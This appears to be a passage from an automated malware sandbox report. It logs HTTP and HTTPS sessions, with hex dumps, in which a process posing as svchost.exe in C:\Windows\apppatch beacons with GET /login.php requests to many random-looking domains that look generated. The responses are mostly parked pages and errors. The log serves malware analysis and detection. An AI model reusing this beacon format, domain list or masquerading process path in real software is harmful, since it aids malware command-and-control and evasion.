                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                            Nov 11, 2024 18:08:34.358048916 CET169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            78192.168.2.9626483.94.10.3480
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.540366888 CET353OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lymyxid.com
                                                                                                                                                                                                            Cookie: snkz=66.23.206.109; btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344906|1731344858|24|2|0
                                                                                                                                                                                                            Nov 11, 2024 18:08:36.740261078 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:35 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344915|1731344858|16|3|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0
                                                                                                                                                                                                            Nov 11, 2024 18:08:36.741995096 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:35 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344915|1731344858|16|3|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0
                                                                                                                                                                                                            Nov 11, 2024 18:08:36.744466066 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:35 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344915|1731344858|16|3|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            79192.168.2.962650199.191.50.8380
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.664788008 CET279OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: galyqaz.com
                                                                                                                                                                                                            Cookie: vsid=910vr4788904590031611
                                                                                                                                                                                                            Nov 11, 2024 18:08:37.391514063 CET620INHTTP/1.1 302 Found
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:36 GMT
                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                            Location: //ww8.galyqaz.com
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            80192.168.2.962658178.162.203.21180
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.681813002 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.989332914 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:36.410347939 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            81192.168.2.962643208.100.26.24580
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.839986086 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            82192.168.2.962667199.59.243.22780
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.847888947 CET305OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vojyqem.com
                                                                                                                                                                                                            Cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65


                                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.95687699.83.170.34437444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-11 17:07:39 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-11 17:07:39 UTC352INHTTP/1.1 200 OK
                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000
                                                                                                                                                                                                            Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:39 GMT
                                                                                                                                                                                                            Etag: "gld75vn2va19wv"
                                                                                                                                                                                                            Server: Caddy
                                                                                                                                                                                                            Server: awselb/2.0
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            X-Powered-By: Next.js
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            2024-11-11 17:07:39 UTC2372INData Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 70 75 62 6c 69 63 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31
                                                                                                                                                                                                            Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><link rel="apple-touch-icon" sizes="180x180" href="https://d15wejze7d2tlj.cloudfront.net/v1/public/apple-touch-icon.png"/><link rel="icon" type="image/png" sizes="32x32" href="https://d1
                                                                                                                                                                                                            2024-11-11 17:07:39 UTC1724INData Raw: 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 31 35 35 61 35 35 36 2d 37 32 37 37 64 32 30 35 62 33 61 39 36 64 64 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 37 37 39 62 62 35 65 2d 65 33 34 61 63 36 66 32 62 33 32 65 65 39 62 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f
                                                                                                                                                                                                            Data Ascii: ext/static/chunks/b155a556-7277d205b3a96dd1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/chunks/b779bb5e-e34ac6f2b32ee9b1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/
                                                                                                                                                                                                            2024-11-11 17:07:39 UTC4744INData Raw: 78 2d 63 6f 6c 20 67 61 70 2d 32 20 6d 62 2d 36 22 3e 3c 68 32 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 78 6c 20 66 6f 6e 74 2d 62 6f 6c 64 20 73 6d 3a 74 65 78 74 2d 32 78 6c 22 3e 49 6e 71 75 69 72 65 20 74 6f 64 61 79 20 74 6f 20 73 65 63 75 72 65 20 74 68 69 73 20 64 6f 6d 61 69 6e 3c 2f 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 73 6d 20 66 6f 6e 74 2d 6e 6f 72 6d 61 6c 20 73 6d 3a 74 65 78 74 2d 62 61 73 65 22 3e 50 6c 65 61 73 65 20 63 6f 6d 70 6c 65 74 65 20 74 68 65 20 66 6f 72 6d 20 62 65 6c 6f 77 20 61 6e 64 20 77 65 20 77 69 6c 6c 20 63 6f 6e 6e 65 63 74 20 79 6f 75 20 77 69 74 68 20 6f 6e 65 20 6f 66 20 6f 75 72 20 64 6f 6d 61 69 6e 20 65 78 70 65 72 74 73 2e
                                                                                                                                                                                                            Data Ascii: x-col gap-2 mb-6"><h2 class="font-Inter text-xl font-bold sm:text-2xl">Inquire today to secure this domain</h2><span class="font-Inter text-sm font-normal sm:text-base">Please complete the form below and we will connect you with one of our domain experts.
                                                                                                                                                                                                            2024-11-11 17:07:39 UTC5930INData Raw: 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 44 45 22 3e 44 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 34 39 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 50 45 22 3e 50 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 31 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 4d 58 22 3e 4d 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 32 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 55 22 3e 43 55 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 33 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e
                                                                                                                                                                                                            Data Ascii: -- -->)</option><option value="DE">DE... --> (+... -->49... -->)</option><option value="PE">PE... --> (+... -->51... -->)</option><option value="MX">MX... --> (+... -->52... -->)</option><option value="CU">CU... --> (+... -->53... -->)</option
                                                                                                                                                                                                            2024-11-11 17:07:39 UTC7116INData Raw: 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 36 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 59 22 3e 43 59 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 37 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 41 58 22 3e 41 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 46 49 22 3e 46 49 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 42 47 22 3e 42 47 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20
                                                                                                                                                                                                            Data Ascii: --> (+... -->356... -->)</option><option value="CY">CY... --> (+... -->357... -->)</option><option value="AX">AX... --> (+... -->358... -->)</option><option value="FI">FI... --> (+... -->358... -->)</option><option value="BG">BG... --> (+...
                                                                                                                                                                                                            2024-11-11 17:07:39 UTC8302INData Raw: 69 63 65 2d 72 65 71 75 65 73 74 2d 66 6f 72 6d 2d 69 64 22 20 74 69 74 6c 65 3d 22 47 65 74 20 70 72 69 63 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 65 6e 64 49 63 6f 6e 3d 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 31 2e 35 20 6d 78 2d 61 75 74 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 32 22 3e 47 65 74 20 70 72 69 63 65 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20
                                                                                                                                                                                                            Data Ascii: ice-request-form-id" title="Get price" aria-label="Get price" label="Get price" endIcon="[object Object]"><span class="flex justify-center items-center gap-1.5 mx-auto"><div class="flex items-center gap-2">Get price<svg xmlns="http://www.w3.org/2000/svg"
                                                                                                                                                                                                            2024-11-11 17:07:39 UTC2586INData Raw: 30 2e 33 76 2e 30 36 37 68 2d 2e 31 33 36 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 56 2e 37 36 48 39 2e 39 36 76 2e 30 36 38 68 2d 2e 31 33 36 76 2e 30 36 37 68 2d 2e 30 36 38 76 2e 30 36 38 48 39 2e 36 39 76 2e 30 36 38 48 39 2e 36 32 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 31 33 35 76 2e 30 36 37 48 39 2e 33 35 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 39 2e 30 38 76 2e 30 36 38 48 39 2e 30 31 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 76 2e 30 36 37 48 38 2e 37 34 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 38
                                                                                                                                                                                                            Data Ascii: 0.3v.067h-.136v.068h-.068v.068h-.067V.76H9.96v.068h-.136v.067h-.068v.068H9.69v.068H9.62v.068h-.068v.068h-.135v.067H9.35v.068h-.068v.068h-.068v.068h-.068v.067H9.08v.068H9.01v.068h-.068v.068h-.068v.068h-.067v.067H8.74v.068h-.068v.068h-.068v.068h-.068v.067H8
                                                                                                                                                                                                            2024-11-11 17:07:39 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                            2024-11-11 17:07:39 UTC4096INData Raw: 36 38 38 31 0d 0a 65 6e 74 43 6f 6c 6f 72 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 39 2e 36 37 20 34 2e 34 37 34 68 2d 33 2e 39 34 36 76 31 31 2e 32 38 37 68 33 2e 39 34 35 63 33 2e 36 30 36 20 30 20 35 2e 39 35 2d 32 2e 32 31 35 20 35 2e 39 35 2d 35 2e 36 32 37 20 30 2d 33 2e 34 32 39 2d 32 2e 33 34 34 2d 35 2e 36 36 2d 35 2e 39 35 2d 35 2e 36 36 6d 2d 31 2e 36 38 33 20 39 2e 33 36 32 56 36 2e 33 38 32 68 31 2e 36 30 31 63 32 2e 33 37 38 20 30 20 33 2e 37 32 20 31 2e 34 30 37 20 33 2e 37 32 20 33 2e 37 35 32 73 2d 31 2e 33 34 32 20 33 2e 37 30 32 2d 33 2e 37 32 20 33 2e 37 30 32 7a 6d 31 37 2e 39 38 32 2d 32 2e 35 35 34 63 30 2d 32 2e 38 33 2d 32 2e 30 32 32 2d 34 2e 36 32 35 2d 34 2e 36 30 39 2d 34 2e 36 32 35 73
                                                                                                                                                                                                            Data Ascii: 6881entColor" fill-rule="evenodd" d="M29.67 4.474h-3.946v11.287h3.945c3.606 0 5.95-2.215 5.95-5.627 0-3.429-2.344-5.66-5.95-5.66m-1.683 9.362V6.382h1.601c2.378 0 3.72 1.407 3.72 3.752s-1.342 3.702-3.72 3.702zm17.982-2.554c0-2.83-2.022-4.625-4.609-4.625s
                                                                                                                                                                                                            2024-11-11 17:07:39 UTC13046INData Raw: 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 35 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 31 33 35 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 31 33 35 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 37 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 38 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 31 33 36
                                                                                                                                                                                                            Data Ascii: 068h-.068v-.068h-.135v-.068h-.136v-.068h-.136v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.068v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.136v-.135h-.067v-.068h-.068v-.068h-.068v-.135h-.068v-.068h-.068v-.068h-.067v-.136h-.068v-.067h-.068v-.136h-.068v-.136


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            1192.168.2.956880188.114.96.34437444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-11 17:07:39 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-11-11 17:07:40 UTC943INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:40 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yxBl%2BU1di8myqSyomKhdTxMkueBNPufV9F2zXrBad3JyTyy2b9I1XPYwnytHR19sKAVouOjLtNSBAGHOzRwgTJvKJuW8iMW6a8Nj3wUvcPmDfs3EGmlxpZTsxBe4vg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe13cdf1f7ca8-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1258&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2266040&cwnd=251&unsent_bytes=0&cid=5a5fdb9f7b7a9336&ts=814&x=0"
                                                                                                                                                                                                            2024-11-11 17:07:40 UTC426INData Raw: 37 63 61 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                            Data Ascii: 7cae<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
